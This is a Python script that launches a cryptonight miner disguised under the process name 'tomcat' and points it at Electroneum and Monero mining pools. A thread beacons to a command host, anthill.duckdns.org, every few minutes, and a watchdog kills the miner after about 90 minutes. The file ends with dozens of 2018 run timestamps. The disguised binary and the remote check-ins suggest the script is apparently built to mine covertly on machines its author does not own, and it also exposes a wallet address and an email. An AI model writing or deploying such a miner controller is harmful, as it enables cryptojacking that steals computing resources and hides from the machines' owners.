import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:46:07.100196
#2018-02-17 17:34:01.750217
#2018-02-17 19:22:01.712746
#2018-02-17 21:11:02.197074
#2018-02-17 22:55:05.758039
#2018-02-18 00:41:05.295477
#2018-02-18 02:30:09.330099
#2018-02-18 04:17:05.310625
#2018-02-18 06:07:05.781839
#2018-02-18 07:56:06.763987
#2018-02-18 09:44:08.212441
#2018-02-18 11:31:04.926986
#2018-02-18 13:16:06.336050
#2018-02-18 15:06:01.789333
#2018-02-18 16:52:07.638900
#2018-02-18 18:42:05.362848
#2018-02-18 20:29:05.695965
#2018-02-18 22:15:06.588700
#2018-02-19 00:04:03.619434
#2018-02-19 01:49:07.614461
#2018-02-19 03:37:05.704321
#2018-02-19 05:22:05.012126
#2018-02-19 07:08:05.679645
#2018-02-19 08:56:05.632467
#2018-02-19 10:46:01.768802
#2018-02-19 12:33:09.352699
#2018-02-19 14:21:01.767157
#2018-02-19 16:08:09.886422
#2018-02-19 17:57:10.446497
#2018-02-19 19:45:12.196223
#2018-02-19 21:33:02.112401
#2018-02-19 23:19:04.926788
#2018-02-20 01:05:06.401468
#2018-02-20 02:55:06.648550
#2018-02-20 04:43:03.442389
#2018-02-20 06:27:07.001571
#2018-02-20 08:12:08.343320
#2018-02-20 09:57:02.193290
#2018-02-20 11:41:01.562766
#2018-02-20 13:28:05.032589
#2018-02-20 15:12:06.744450
#2018-02-20 16:58:06.703854
#2018-02-20 18:48:01.899169
#2018-02-20 20:39:07.832421
#2018-02-20 22:23:05.949451
#2018-02-21 00:04:07.415843
#2018-02-21 01:49:06.940616
#2018-02-21 03:32:07.164774
#2018-02-21 05:21:05.424503
#2018-02-21 07:08:03.577214
#2018-02-21 08:54:01.886907
#2018-02-21 10:41:02.218137
#2018-02-21 12:27:09.553415
#2018-02-21 14:15:06.261901
#2018-02-21 16:02:02.047057
#2018-02-21 17:53:01.820224
#2018-02-21 19:40:03.752738
#2018-02-21 21:27:05.695799
#2018-02-21 23:15:03.387775
#2018-02-22 01:05:08.040092
#2018-02-22 02:53:07.662898
#2018-02-22 04:40:06.771228
#2018-02-22 06:25:08.327468
#2018-02-22 08:14:07.717862
#2018-02-22 10:03:04.187250
#2018-02-22 11:46:07.987402
#2018-02-22 13:33:08.910278
#2018-02-22 15:21:04.849079
#2018-02-22 17:07:06.439858
#2018-02-22 18:53:07.766790
#2018-02-22 20:44:07.659978
#2018-02-22 22:30:01.504027
#2018-02-23 00:15:05.316257
#2018-02-23 02:04:06.998804
#2018-02-23 03:50:08.801375
#2018-02-23 05:39:08.027694
#2018-02-23 07:24:02.036063
#2018-02-23 09:27:05.190371
#2018-02-23 11:34:07.308979
#2018-02-23 13:24:01.768133
#2018-02-23 15:09:06.822872
#2018-02-23 16:58:01.344814
#2018-02-23 19:06:05.801912
#2018-02-23 20:51:01.920578
#2018-02-23 22:40:09.690769
#2018-02-24 00:28:06.227903
#2018-02-24 02:20:08.240713
#2018-02-24 04:09:04.453047
#2018-02-24 05:57:01.324786
#2018-02-24 07:46:01.598705
#2018-02-24 09:30:07.021908
#2018-02-24 11:23:07.636058
#2018-02-24 13:12:04.011027
#2018-02-24 15:02:03.626414
#2018-02-24 16:52:01.782064
#2018-02-24 18:40:07.415370
#2018-02-24 20:30:06.715835
#2018-02-24 22:27:04.751476
#2018-02-25 01:37:05.065273
#2018-02-25 05:19:05.597201
#2018-02-25 11:29:01.305427